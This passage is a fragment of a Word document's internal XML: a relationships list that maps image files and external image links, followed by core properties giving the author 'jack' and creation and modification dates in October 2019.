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105" w:afterAutospacing="0"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="42"/>
          <w:szCs w:val="42"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/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42"/>
          <w:szCs w:val="42"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>2018第二届强网杯线上赛Web</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/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42"/>
          <w:szCs w:val="42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42"/>
          <w:szCs w:val="42"/>
          <w:u w:val="none"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "https://www.ctfwp.com/articals/2018qiangwang.html" \l "2018%E7%AC%AC%E4%BA%8C%E5%B1%8A%E5%BC%BA%E7%BD%91%E6%9D%AF%E7%BA%BF%E4%B8%8A%E8%B5%9Bweb" </w:instrTex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42"/>
          <w:szCs w:val="42"/>
          <w:u w:val="none"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0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42"/>
          <w:szCs w:val="42"/>
          <w:u w:val="none"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF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268" w:beforeAutospacing="0" w:after="105" w:afterAutospacing="0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36"/>
          <w:szCs w:val="3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36"/>
          <w:szCs w:val="36"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>题目类型：</w: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6"/>
          <w:szCs w:val="36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6"/>
          <w:szCs w:val="36"/>
          <w:u w:val="none"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "https://www.ctfwp.com/articals/2018qiangwang.html" \l "%E9%A2%98%E7%9B%AE%E7%B1%BB%E5%9E%8B%EF%BC%9A" </w:instrTex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6"/>
          <w:szCs w:val="36"/>
          <w:u w:val="none"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0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6"/>
          <w:szCs w:val="36"/>
          <w:u w:val="none"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="10906" w:type="dxa"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="CCCCCC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5002"/>
        <w:gridCol w:w="3076"/>
        <w:gridCol w:w="2828"/>
      </w:tblGrid>
      <w:tr>
        <w:tblPrEx>
          <w:tblBorders>
            <w:top w:val="single" w:color="CCCCCC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500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33333"/>
                <w:spacing w:val="2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33333"/>
                <w:spacing w:val="2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类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3076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33333"/>
                <w:spacing w:val="2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33333"/>
                <w:spacing w:val="2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年份</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="282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33333"/>
                <w:spacing w:val="2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333333"/>
                <w:spacing w:val="2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难度</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tblPrEx>
          <w:tblBorders>
            <w:top w:val="single" w:color="CCCCCC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500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center"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
                <w:i w:val="0"/>
                <w:caps w:val="0"/>
                <w:color w:val="333333"/>
                <w:spacing w:val="2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33333"/>
                <w:spacing w:val="2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官方赛事题</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3076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center"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
                <w:i w:val="0"/>
                <w:caps w:val="0"/>
                <w:color w:val="333333"/>
                <w:spacing w:val="2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33333"/>
                <w:spacing w:val="2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2018</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="282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firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
                <w:i w:val="0"/>
                <w:caps w:val="0"/>
                <w:color w:val="333333"/>
                <w:spacing w:val="2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333333"/>
                <w:spacing w:val="2"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>难</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:shd w:val="clear" w:fill="FFFFFF"/>
        <w:spacing w:before="268" w:beforeAutospacing="0" w:after="105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42"/>
          <w:szCs w:val="42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42"/>
          <w:szCs w:val="42"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>题目下载：</w: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42"/>
          <w:szCs w:val="42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42"/>
          <w:szCs w:val="42"/>
          <w:u w:val="none"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "https://www.ctfwp.com/articals/2018qiangwang.html" \l "%E9%A2%98%E7%9B%AE%E4%B8%8B%E8%BD%BD%EF%BC%9A" </w:instrTex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42"/>
          <w:szCs w:val="42"/>
          <w:u w:val="none"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0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42"/>
          <w:szCs w:val="42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0" w:hanging="360"/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bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>暂无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268" w:beforeAutospacing="0" w:after="105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42"/>
          <w:szCs w:val="42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42"/>
          <w:szCs w:val="42"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>网上公开WP：</w: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42"/>
          <w:szCs w:val="42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42"/>
          <w:szCs w:val="42"/>
          <w:u w:val="none"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "https://www.ctfwp.com/articals/2018qiangwang.html" \l "%E7%BD%91%E4%B8%8A%E5%85%AC%E5%BC%80wp%EF%BC%9A" </w:instrTex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42"/>
          <w:szCs w:val="42"/>
          <w:u w:val="none"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0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42"/>
          <w:szCs w:val="42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0" w:hanging="360"/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instrText xml:space="preserve"> HYPERLINK "http://www.cnblogs.com/iamstudy/articles/2th_qiangwangbei_ctf_writeup.html" \t "https://www.ctfwp.com/articals/_blank" </w:instrTex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t>http://www.cnblogs.com/iamstudy/articles/2th_qiangwangbei_ctf_writeup.html</w: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0" w:hanging="360"/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instrText xml:space="preserve"> HYPERLINK "https://www.cnblogs.com/iamstudy/articles/2th_qiangwangbei_ctf_writeup.html" \t "https://www.ctfwp.com/articals/_blank" </w:instrTex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t>https://www.cnblogs.com/iamstudy/articles/2th_qiangwangbei_ctf_writeup.html</w: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0" w:hanging="360"/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instrText xml:space="preserve"> HYPERLINK "https://xz.aliyun.com/t/2219" \t "https://www.ctfwp.com/articals/_blank" </w:instrTex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t>https://xz.aliyun.com/t/2219</w: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0" w:hanging="360"/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instrText xml:space="preserve"> HYPERLINK "http://pupiles.com/qiangwangbei.html" \t "https://www.ctfwp.com/articals/_blank" </w:instrTex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t>http://pupiles.com/qiangwangbei.html</w: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fldChar w:fldCharType="end"/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268" w:beforeAutospacing="0" w:after="105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42"/>
          <w:szCs w:val="42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42"/>
          <w:szCs w:val="42"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>本站备份WP：</w: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42"/>
          <w:szCs w:val="42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42"/>
          <w:szCs w:val="42"/>
          <w:u w:val="none"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "https://www.ctfwp.com/articals/2018qiangwang.html" \l "%E6%9C%AC%E7%AB%99%E5%A4%87%E4%BB%BDwp%EF%BC%9A" </w:instrTex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42"/>
          <w:szCs w:val="42"/>
          <w:u w:val="none"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0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42"/>
          <w:szCs w:val="42"/>
          <w:u w:val="none"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF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Style w:val="10"/>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>感谢作者：l3m0n、FlappyPig、Pupil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268" w:beforeAutospacing="0" w:after="105" w:afterAutospacing="0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36"/>
          <w:szCs w:val="3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36"/>
          <w:szCs w:val="36"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Web</w: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6"/>
          <w:szCs w:val="36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6"/>
          <w:szCs w:val="36"/>
          <w:u w:val="none"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "https://www.ctfwp.com/articals/2018qiangwang.html" \l "web" </w:instrTex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6"/>
          <w:szCs w:val="36"/>
          <w:u w:val="none"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0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6"/>
          <w:szCs w:val="36"/>
          <w:u w:val="none"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF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268" w:beforeAutospacing="0" w:after="105" w:afterAutospacing="0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31"/>
          <w:szCs w:val="3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31"/>
          <w:szCs w:val="31"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>web签到</w: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instrText xml:space="preserve"> HYPERLINK "https://www.ctfwp.com/articals/2018qiangwang.html" \l "web%E7%AD%BE%E5%88%B0" </w:instrTex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第一层：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&lt;!--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$_POST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'param1'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]!=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$_POST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'param2'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&amp;&amp;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md5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$_POST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'param1'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])==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md5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$_POST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'param2'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die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"success!"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}--&gt;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这里可以用2个字符串绕过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param1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240610708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&amp;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param2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QNKCDZO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第二层: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&lt;!--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$_POST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'param1'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]!==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$_POST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'param2'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&amp;&amp;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md5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$_POST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'param1'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])===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md5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$_POST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'param2'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die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"success!"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}--&gt;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使用了强等于，那么使用数组绕过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param1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[]=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&amp;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param2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[]=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使用了强制字符串转化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一番谷歌后发现这是去年BKPCTF改的一道题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payload如下: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Param1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c9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68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e3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5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20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95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72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d4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77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7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72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15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87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d3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6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a7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dc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56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b7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3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c0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78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3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7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95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18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00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a8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28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f3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6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8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55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b3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5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75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93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d8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49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67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6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a0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d1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55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5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83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60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fb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5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07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Param2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c9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68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e3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5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20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95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72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d4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77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7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72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15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87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d3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6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a7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dc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56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b7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3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c0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78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3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7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95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18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a8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28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f3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6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8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55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b3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5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75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93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d8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49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67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6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a0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d1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d5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5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83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60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fb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5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07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a2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178" w:afterAutospacing="0" w:line="24" w:lineRule="atLeast"/>
        <w:ind w:left="720" w:right="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="858585"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>注：上述两个字符串其md5加密后密文相同。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268" w:beforeAutospacing="0" w:after="105" w:afterAutospacing="0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31"/>
          <w:szCs w:val="3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31"/>
          <w:szCs w:val="31"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Share your mind</w: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instrText xml:space="preserve"> HYPERLINK "https://www.ctfwp.com/articals/2018qiangwang.html" \l "share-your-mind" </w:instrTex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这题必须要写一下自己的踩坑经历，首先进去浏览一下页面功能，有个提交bug页面的地方，还有个可以新建文章的地方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12639675" cy="4933950"/>
            <wp:effectExtent l="0" t="0" r="9525" b="3810"/>
            <wp:docPr id="13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639675" cy="493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最后就是浏览文章(但是只能浏览自己发的文章)，首先想到的就是xss+csrf，新建一个文章引用一段JS然后发给bot，然后ajax请求admin的文章发回来。可是按照这个思路我们发现在新建文章页面我们的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被过滤了，所以我们不能直接构造一个js。猜想能不能在report页面里进行xss，但是发现存在过滤，只能像自己网站的地址发起请求，但是”居然”可以绕过!!!!!!,payload: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http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://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39.107.33.96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20000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php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report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/&lt;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script src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color w:val="E3116C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"xxxxxx.com"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&gt;&lt;/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于是无尽的踩坑之旅开始了，首先是bot返回结果没有cookie，一开始也没在意以为设置了httponly,(后来大致明白bot过程了,先check url-未读,然后add_cookie-已读，这里直接用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标签其实是在add_cookie之前就返回了所以不带cookie)让他AJAX请求访问admin的文章，代码如下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var a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new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XMLHttpRequest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open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'GET'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'index.php/view/article/1'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send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null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b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responseText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;(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new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()).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src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'http://xxxxx/?flag='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escape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);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结果bot返回结果是未登录，然后我就很懵逼，后来给了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hint1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:phantomjs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2.1.1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结果这提示给了以后我就以为是日bot，各种谷歌找2.1.1的漏洞，一直到下午出了hint2:漏洞点不在report…推翻了一个下午的努力成果。一直到晚上我才想起来index页面有一个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../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js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bootstrap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min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js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的相对路径引用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6124575" cy="1895475"/>
            <wp:effectExtent l="0" t="0" r="1905" b="9525"/>
            <wp:docPr id="18" name="图片 2" descr="IMG_257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 descr="IMG_25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想起来寒假时候看的rpo，关于rpo的原理这里不想赘述了，给个连接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178" w:afterAutospacing="0" w:line="24" w:lineRule="atLeast"/>
        <w:ind w:left="720" w:right="720"/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instrText xml:space="preserve"> HYPERLINK "https://open.appscan.io/article-462.html" \t "https://www.ctfwp.com/articals/_blank" </w:instrTex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t>https://open.appscan.io/article-462.html</w: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这里文章查看页面没有引用DOCTYPE html，所以存在rpo漏洞,新建一个文章,文章title为空(title不为空的时候会添加一个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h1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标签导致浏览器解析js的时候报错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2676525" cy="1104900"/>
            <wp:effectExtent l="0" t="0" r="5715" b="7620"/>
            <wp:docPr id="12" name="图片 3" descr="IMG_258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 descr="IMG_25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内容输入js代码比如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7505700" cy="2819400"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="14" name="图片 4" descr="IMG_259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 descr="IMG_25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然后访问这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http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://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39.107.33.96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20000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php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view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article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/635/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..%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..%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..%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..%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findex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php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9934575" cy="5934075"/>
            <wp:effectExtent l="0" t="0" r="1905" b="9525"/>
            <wp:docPr id="19" name="图片 5" descr="IMG_260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 descr="IMG_26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934575" cy="593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把635替换成你的文章代码,这里对于服务器来说访问的是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http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://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39.107.33.96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20000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php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但是对于浏览器来说他访问的就是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http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://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39.107.33.96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20000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php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view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article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/635/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..%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..%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..%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..%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findex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php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然后这个时候浏览器会发起js请求去请求原本index.php会加载的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../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js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bootstrap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min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js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就是向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http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://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39.107.33.96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20000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php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view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article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/635/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..%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..%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..%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..%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findex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php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/../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js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bootstrap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min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js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相当于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http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://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39.107.33.96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20000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php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view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article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635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bootstrap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min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js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这里访问的结果和访问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http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://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39.107.33.96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20000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php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view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article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/635/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也就是你的文章的内容是一样的(不明白的可以自己本地测试)，不同的是浏览器是以js引擎去解析你的文章的，也就是会把你的文章当成一段js去执行。所以这里就可以绕过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的过滤执行xss了。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所以我们新建一个文章内容为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var a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new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XMLHttpRequest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open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'GET'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'yourvpsip'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send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null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);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然后用浏览器访问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http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://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39.107.33.96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20000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php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view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article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/22957/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..%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..%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..%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..%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findex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php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然后这里发现居然没有发起请求，查看源码发现是过滤了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和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，然后我就自作聪明的用反引号，然后我就陷入了无尽的玄学道路，我发现本地浏览器，vsp就可以收到请求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8162925" cy="2171700"/>
            <wp:effectExtent l="0" t="0" r="5715" b="7620"/>
            <wp:docPr id="15" name="图片 6" descr="IMG_261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 descr="IMG_26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但是提交给bot就收不到请求，然后我就一直在这里卡了超级长的时间，期间还问了出题人,bot等问题…直到晚上用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fromCharCode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才解决了这个玄学问题(这个点真心卡了我好久),后面就比较简单了收到请求后发现cookie有提示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联想到国赛的一道读取子目录cookie的题目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178" w:afterAutospacing="0" w:line="24" w:lineRule="atLeast"/>
        <w:ind w:left="720" w:right="720"/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instrText xml:space="preserve"> HYPERLINK "https://www.lorexxar.cn/2017/07/11/guosai2017/" \t "https://www.ctfwp.com/articals/_blank" </w:instrTex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t>https://www.lorexxar.cn/2017/07/11/guosai2017/</w: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脚本拿来改了改就可以get子目录cookie了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var iframe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document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"iframe"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iframe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src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"/QWB_f14g/QWB"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iframe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id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"frame"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body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appendChild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iframe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iframe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onload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function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var c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document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'frame'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contentWindow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cookie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var n0t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document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"link"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n0t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setAttribute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"rel"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"prefetch"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n0t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setAttribute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"href"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"//xxx/?"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c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document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head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appendChild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n0t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);}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然后把所有引号之间的内容用String.fromcode()编码一下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9753600" cy="2466975"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="20" name="图片 7" descr="IMG_262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 descr="IMG_26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268" w:beforeAutospacing="0" w:after="105" w:afterAutospacing="0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31"/>
          <w:szCs w:val="3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31"/>
          <w:szCs w:val="31"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Three hit</w: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instrText xml:space="preserve"> HYPERLINK "https://www.ctfwp.com/articals/2018qiangwang.html" \l "three-hit" </w:instrTex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进去后发现功能很少，猜测二次注入，发现username有正则限制，那么测试age，发现必须整数，这里可以用16进制绕过，测试一番后发现是个盲注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10353675" cy="3571875"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="11" name="图片 8" descr="IMG_263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 descr="IMG_26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35367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8477250" cy="3038475"/>
            <wp:effectExtent l="0" t="0" r="11430" b="9525"/>
            <wp:docPr id="16" name="图片 9" descr="IMG_264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 descr="IMG_26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8562975" cy="3762375"/>
            <wp:effectExtent l="0" t="0" r="1905" b="1905"/>
            <wp:docPr id="21" name="图片 10" descr="IMG_265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 descr="IMG_26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5629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找了个脚本改了下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import requests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import binascii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url_register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"http://39.107.32.29:10000/index.php?func=register"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url_login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"http://39.107.32.29:10000/index.php?func=login"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result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'[*]result:'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for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range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65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for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range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32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127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age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"1223 or ascii(substr((select flag from flag limit 1),{0},1))={1}#"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format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str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str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age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binascii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hexlify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bytes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age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'utf8'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age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"0x"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str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age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"utf8"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username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"pupiles{0}{1}"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format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str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str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data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"username"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username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"123456"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"age"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age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while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True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try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resp1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requests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post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url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url_register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allow_redirects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break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except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Exception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as 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continue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while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True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try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resp2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requests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post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url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url_login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allow_redirects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True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"&lt;a&gt;123&lt;/a&gt;"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resp2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text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    result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chr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    print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break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except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Exception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as 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continue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盲注跑出flag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268" w:beforeAutospacing="0" w:after="105" w:afterAutospacing="0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31"/>
          <w:szCs w:val="3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31"/>
          <w:szCs w:val="31"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Wechat</w: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instrText xml:space="preserve"> HYPERLINK "https://www.ctfwp.com/articals/2018qiangwang.html" \l "wechat" </w:instrTex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14325600" cy="6038850"/>
            <wp:effectExtent l="0" t="0" r="0" b="11430"/>
            <wp:docPr id="22" name="图片 11" descr="IMG_266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 descr="IMG_26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0" cy="603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出题人给出了公众后后面的地址，查看微信公众号的SDK可以发现可以通过一些xml数据进行发送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import requests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url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"http://39.107.33.77/"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content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"Test http://www.baidu.com TEAMKEY icq3be93d38562e68bc0a86368c2d6b2"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data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xml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ToUserName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&gt;&lt;![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]]&gt;&lt;/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ToUserName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FromUserName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&gt;&lt;![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select content from note limit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3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))--]]&gt;&lt;/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FromUserName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CreateTime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1348831860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CreateTime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MsgType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&gt;&lt;![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text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]]&gt;&lt;/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MsgType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&gt;&lt;![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%s]]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MsgId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1234567890123456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MsgId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AgentID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AgentID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&gt;&lt;/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xml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'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content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print requests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post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url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content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通过提示存在注入，可以得到以下信息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xml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ToUserName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&gt;&lt;![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select content from note limit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3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))--]]&gt;&lt;/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ToUserName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FromUserName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&gt;&lt;![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]]&gt;&lt;/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FromUserName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CreateTime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1521882365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CreateTime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MsgType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&gt;&lt;![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text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]]&gt;&lt;/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MsgType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&gt;&lt;![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Success!Start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Time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:You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can leave me message here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http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://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wc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qwb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com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8088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leave_message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php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Over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Time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:Sat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Mar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24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09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06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05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2018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]]&gt;&lt;/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MsgId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1234567890123456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MsgId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&gt;&lt;/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xml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绑定host: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wc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qwb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com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的ip为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39.107.33.77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16078200" cy="12382500"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="17" name="图片 12" descr="IMG_267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 descr="IMG_26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0" cy="1238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其中message存在注入，限制的比较严格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POST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leave_message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php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HTTP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1.1Host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wc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qwb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com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8088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user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aaaaaaaaaaaaaaa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&amp;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aaaa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@qq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com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&amp;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team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icq3be93d38562e68bc0a86368c2d6b2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&amp;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'-(sleep(ceil(pi())))-'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&amp;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submit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submit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13354050" cy="13315950"/>
            <wp:effectExtent l="0" t="0" r="11430" b="3810"/>
            <wp:docPr id="8" name="图片 13" descr="IMG_268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3" descr="IMG_26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354050" cy="1331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比如sleep函数参数里面不能用数字，可以使用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pi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来绕过，另外就是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select from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部分。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12333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'-(if(ascii(substring((select@b:=group_concat(username)from{cl0und.adminuser}),%s,1))like'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',sleep(pi()),0))-'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这里字段都需要猜解，猜不到password字段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http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://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wc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qwb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com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8088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forgetpassword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php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利用密码找回功能，注入出code，找回管理员密码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进入后台后，发现有一段上传处，主要用于用户的头像上传。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文件上传后便会将图片的内容显示出来。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19011900" cy="7829550"/>
            <wp:effectExtent l="0" t="0" r="7620" b="3810"/>
            <wp:docPr id="9" name="图片 14" descr="IMG_269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4" descr="IMG_26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011900" cy="782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再往后面看htm中有一段注释。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18135600" cy="12611100"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="7" name="图片 15" descr="IMG_270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5" descr="IMG_27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0" cy="1261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其中urlink存在ssrf漏洞，没有限制协议以及后面的字符，当然大部分的特殊符号不能用，只能读取一些配置文件。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POST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getimg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php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HTTP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1.1Host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wc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qwb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com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8088Cookie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PHPSESSID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cjq7naar02kajivdftljhj2h44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------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WebKitFormBoundaryOXFwabnsGhrKdxynContent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Disposition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form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"urlink"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://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wc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qwb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com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8088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etc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apache2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apache2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conf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------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WebKitFormBoundaryOXFwabnsGhrKdxyn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--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读取到apache的配置文件，可以看到内容。很郁闷，比赛的时候读取了这个文件，但是base64的内容没取完整导致没看到这部分，还是需要细心…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/>
          <w:caps w:val="0"/>
          <w:color w:val="999988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#&lt;Directory /home/qwbweb/backdoor&gt;#       Port    23333#   Options Indexes FollowSymLinks#   AllowOverride None#   Require all granted#   Here is a Bin with its libc#&lt;/Directory&gt;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剩下的就是文件读取pwn程序，然后pwnpwnpwn了，太菜了，不会做。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268" w:beforeAutospacing="0" w:after="105" w:afterAutospacing="0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31"/>
          <w:szCs w:val="3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31"/>
          <w:szCs w:val="31"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>教育机构</w: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instrText xml:space="preserve"> HYPERLINK "https://www.ctfwp.com/articals/2018qiangwang.html" \l "%E6%95%99%E8%82%B2%E6%9C%BA%E6%9E%84" </w:instrTex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这个题目其实特别懵逼，给了一个域名，还以为是要来一场真实环境渗透题，所以信息收集方面都做了。比如扫二级域名，扫端口，扫文件(一扫就被ban)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80端口看的实在懵逼，毫无头绪。就看了一下33899端口的东西，有一个.idea的泄露，但是并没有什么用。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http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://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39.107.33.75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33899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idea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workspace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xml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内容被注释了一段xm调用实体的变量，有点想xxe。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还有一个地方就是提交评论的地方，但是无论怎么样写入都是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E3116C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"未知错误！！！请重试"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22498050" cy="8420100"/>
            <wp:effectExtent l="0" t="0" r="11430" b="7620"/>
            <wp:docPr id="2" name="图片 16" descr="IMG_271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6" descr="IMG_27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498050" cy="842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传入数组的时候发现出现问题了。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22517100" cy="10591800"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="3" name="图片 17" descr="IMG_272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7" descr="IMG_27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517100" cy="1059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comment处有被userdecode处理过，试一下xml头，就可以看到有报错，考点应该就是xxe。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&lt;?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xml version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color w:val="E3116C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"1.0"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 encoding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color w:val="E3116C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?&gt;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22421850" cy="9296400"/>
            <wp:effectExtent l="0" t="0" r="11430" b="0"/>
            <wp:docPr id="5" name="图片 18" descr="IMG_273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8" descr="IMG_27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421850" cy="929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通过盲xxe，可以获取到文件。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远程服务器布置一个1.xml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ENTITY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payload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SYSTEM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"php://filter/read=convert.base64-encode/resource=/etc/passwd"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&gt;&lt;!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ENTITY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int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"&lt;!ENTITY &amp;#37; trick SYSTEM 'http://ip/test/?xxe_local=%payload;'&gt;"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;%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trick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;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comment再进行调用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&lt;?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xml version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"1.0"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encoding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?&gt;&lt;!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DOCTYPE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root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[&lt;!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ENTITY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remote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SYSTEM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"http://ip/xxe/1.xml"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remote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]&gt;&lt;/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root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获取一下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var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www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52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dandan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cc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public_html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config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php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&lt;?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php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define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BASEDIR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"/var/www/52dandan.club/"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define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FLAG_SIG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define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SECRETFILE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'/var/www/52dandan.com/public_html/youwillneverknowthisfile_e2cd3614b63ccdcbfe7c8f07376fe431'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);....?&gt;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拿到了一半的flag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Ok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you get the first part of flag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5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bdd3b0ba1fcb40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then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you can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do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more to get more part of flag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这里出现了一个问题，就是获取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var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www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52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dandan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cc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public_html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common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php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的时候出现了Detected an entity reference loop错误。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11182350" cy="5734050"/>
            <wp:effectExtent l="0" t="0" r="3810" b="11430"/>
            <wp:docPr id="4" name="图片 19" descr="IMG_274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9" descr="IMG_27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182350" cy="573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查了一下资料，libxml解析器默认限制外部实体长度为2k，没法突破，只能寻找一下压缩数据方面的。php过滤器中提供了一个zlib.inflate压缩数据。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压缩：echo file_get_contents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"php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd"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解压：echo file_get_contents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"php://filter/read=convert.base64-decode/zlib.inflate/resource=/tmp/1"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);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这样就可以获取到common.php文件源码了!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14001750" cy="9715500"/>
            <wp:effectExtent l="0" t="0" r="3810" b="7620"/>
            <wp:docPr id="1" name="图片 20" descr="IMG_275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0" descr="IMG_27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0" cy="971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再获取一下机器的一些ip信息，其中arp信息中保留了一个内网地址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proc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net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arp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etc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host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IP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address      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HW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type    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Flags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HW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address           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Mask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Device192.168.223.18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0x1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0x2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42:c0:a8:df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12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*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eth0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192.168.223.1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0x1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0x2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91:f9:c9:d4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*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eth0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开放了一个80端口，test.php的shop参数存在注入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ENTITY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payload    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SYSTEM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"http://192.168.223.18/test.php?shop=3'-(case%a0when((1)like(1))then(0)else(1)end)-'1"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&gt;&lt;!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ENTITY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int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"&lt;!ENTITY &amp;#37; trick SYSTEM 'http://ip/test/?xxe_local=%payload;'&gt;"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;%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trick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;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做不动了，不想做了。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2333，学习了一个防止扫描器的姿势，如果扫描器爬到test.php，当然对一般的目录扫描效果不大，一般都是HEAD请求。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test.php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&lt;?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php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$agent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strtolower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$_SERVER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'HTTP_USER_AGENT'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]);//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check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for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nikto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sql map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"bad"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subfolders which only exist on wordpress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strpos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$agent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'nikto'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!==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false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||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strpos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$agent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'sqlmap'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!==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false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||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startswith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$url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'wp-'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||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startswith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$url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'wordpress'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||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startswith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$url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'wp/'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sendBomb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exit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();}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function sendBomb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prepare the client to recieve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GZIP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This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will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not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be suspicious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since most web servers use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GZIP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by default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header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"Content-Encoding: gzip"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header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"Content-Length: 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filesize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'www.gzip'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//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off output buffering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ob_get_level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ob_end_clean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send the gzipped file to the client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readfile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'10G.gzip'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);}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function startsWith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$haystack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$needle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substr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$haystack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strlen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$needle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===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$needle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);}?&gt;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know it then do it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Python is the best language 1/2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http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://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39.107.32.29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20000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http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://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117.50.16.51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20000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下载地址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备用下载地址（密码：rtou）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'm learning the flask recently,and I think python is the best language in the world!don'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 you think so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?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268" w:beforeAutospacing="0" w:after="105" w:afterAutospacing="0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31"/>
